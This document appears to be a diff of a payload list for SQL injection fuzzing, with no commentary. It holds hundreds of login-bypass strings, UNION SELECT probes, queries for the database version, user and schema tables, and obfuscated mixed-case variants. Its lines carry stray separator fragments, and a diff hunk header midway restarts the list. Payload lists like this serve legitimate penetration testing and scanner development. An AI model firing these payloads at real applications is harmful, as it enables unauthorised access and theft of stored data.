|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
